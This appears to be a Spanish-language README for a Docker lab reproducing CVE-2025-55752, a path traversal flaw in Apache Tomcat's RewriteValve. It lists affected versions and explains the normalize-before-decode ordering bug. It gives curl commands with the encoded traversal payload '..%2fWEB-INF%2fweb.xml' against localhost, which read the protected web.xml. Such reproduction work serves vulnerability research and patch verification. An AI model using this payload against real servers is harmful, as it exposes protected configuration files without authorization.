
# Entorno de reproducción basado en Docker para CVE-2025-55752, una vulnerabilidad de path traversal en RewriteValve de Apache Tomcat, que demuestra la falla de normalizar antes de decodificar y proporciona comandos de prueba.
Entorno de reproducción basado en Docker para CVE-2025-55752, una vulnerabilidad de path traversal en Apache Tomcat 10.1.44.
CVE-2025-55752 es una vulnerabilidad de path traversal en RewriteValve de Apache Tomcat causada por un procesamiento incorrecto
del orden: la normalización de URL ocurre antes de la decodificación de URL. Esto permite a los atacantes eludir las restricciones de seguridad
que protegen directorios como /WEB-INF/ mediante secuencias de path traversal codificadas en URL (..%2f).
| Serie | Versiones vulnerables | Versión parcheada |
|---|---|---|
| 11.x | 11.0.0-M1 a 11.0.10 | 11.0.11+ |
| 10.1.x | 10.1.0-M1 a 10.1.44 | 10.1.45+ |
| 9.0.x | 9.0.0-M11 a 9.0.108 | 9.0.109+ |
| 8.5.x | 8.5.6 a 8.5.100 | EOL - Sin parche |
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/
curl -I 'http://localhost:8080/WEB-INF/web.xml'
Esperado: 403 Forbidden
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'
Esperado: 200 OK + contenido de web.xml (vulnerabilidad confirmada)
/download?path=..%2fWEB-INF%2fweb.xml/files/..%2fWEB-INF%2fweb.xml%2f no se reconoce como /, .. sobrevive%2f → / → /files/../WEB-INF/web.xml/WEB-INF/web.xmlCorrecto: Decodificar → Normalizar → Comprobación de seguridad
Vulnerable: Normalizar → Decodificar → Comprobación de seguridad ✗
../ y %2e%2e⚠️ ADVERTENCIA: NO implementar en producción. Usar únicamente en entornos de prueba aislados.